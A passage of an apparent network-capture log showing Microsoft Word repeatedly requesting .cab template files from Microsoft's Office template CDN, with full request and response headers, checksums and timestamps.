User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iGe99fx1Tanab1ujQTNFlQ==
Last-Modified: Wed, 29 Aug 2018 18:19:43 GMT
ETag: 0x8D60DDBFE4BB50C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1aa38d20-a01e-00b7-6997-a0a780000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:46 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851227.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: karb7EFxz6gpK2GEkvXvNA==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC8848A0495
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c81084a1-301e-0023-0625-b910e9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403392701.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8laspQm0xsAUTSeMcDawqA==
Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
ETag: 0x8D60DDBDD02F94A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851219.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ae2zv4HJn+ipS7oDQIxa4Q==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC8822FFB6E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d1eac4bf-d01e-0092-5897-a00efc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851220.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC8827914A7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6af291c5-801e-0036-306e-a9075a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0403392901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: go+WAx9Av468teUqrut+TA==
Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
ETag: 0x8D60DDC4354B7FB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a3240f77-901e-0000-474a-3a8045000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851222.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: bXh7HiI9trkbaSOAYsyocg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC8830E54C8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2bee5db1-501e-00ee-2682-b92003000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB824A3C69
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e38519df-901e-010c-7f9a-a090cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851223.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
ETag: 0x8D36AC88357BC32
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1e858e71-b01e-0028-5118-2de1ed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851221.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HW+Oc6BmKkjTMgkKTIyJjw==
Last-Modified: Fri, 22 Apr 2016 16:09:40 GMT
ETag: 0x8D36AC882C4ED43
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e4f000bb-501e-0148-0297-a06910000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851224.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 08kDbk4RWegysbTS6dQr8A==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883A171B7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7a3535a8-301e-0103-55f4-b69543000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851225.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
ETag: 0x8D36AC883F49D7D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b3f59ba9-f01e-00aa-4597-a0aa3c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0309043402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
Last-Modified: Wed, 29 Aug 2018 18:14:30 GMT
ETag: 0x8D60DDB43B59EC5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b73fb8ce-601e-005c-4e97-a0df72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp02851226.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
ETag: 0x8D36AC88440C433
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19a4e9a0-101e-0104-7797-a0f920000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c28a3f34-b01e-00c9-0497-a037c7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328893.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
ETag: 0x8D36AC898C9059A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7e7953a4-301e-000c-4e28-bf1d22000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328905.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC886167DDF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3e37f31b-801e-0044-5062-b90015000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328908.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iamBjmZY1zpztkJSL/hwHw==
Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
ETag: 0x8D36AC8865F4922
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7551dfc1-501e-00b3-0597-a02a87000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 16:09:47 GMT
ETag: 0x8D36AC886C4C4EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1184cf03-901e-010a-18fd-bfd090000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9CC48C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ea01ec0c-b01e-0110-4a97-a048da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8871139C3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bd32d8ea-801e-0033-2376-14dfee000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:42 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d5cd4d7a-901e-011a-2b97-a015f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:43 GMT
ETag: 0x8D60DDBDA502B66
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4182b976-401e-0119-4e97-a0f49c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cfa2269-c01e-0045-22f2-a05fc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 11 Dec 2024 09:46:43 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
-
Remote address:2.19.252.161:443RequestGET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 76A53119-4839-4C9F-A22C-8EF92D13AE24
Host: binaries.templates.cdn.office.net
ResponseHTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 16:09:48 GMT
ETag: 0x8D36AC8875AEF5A
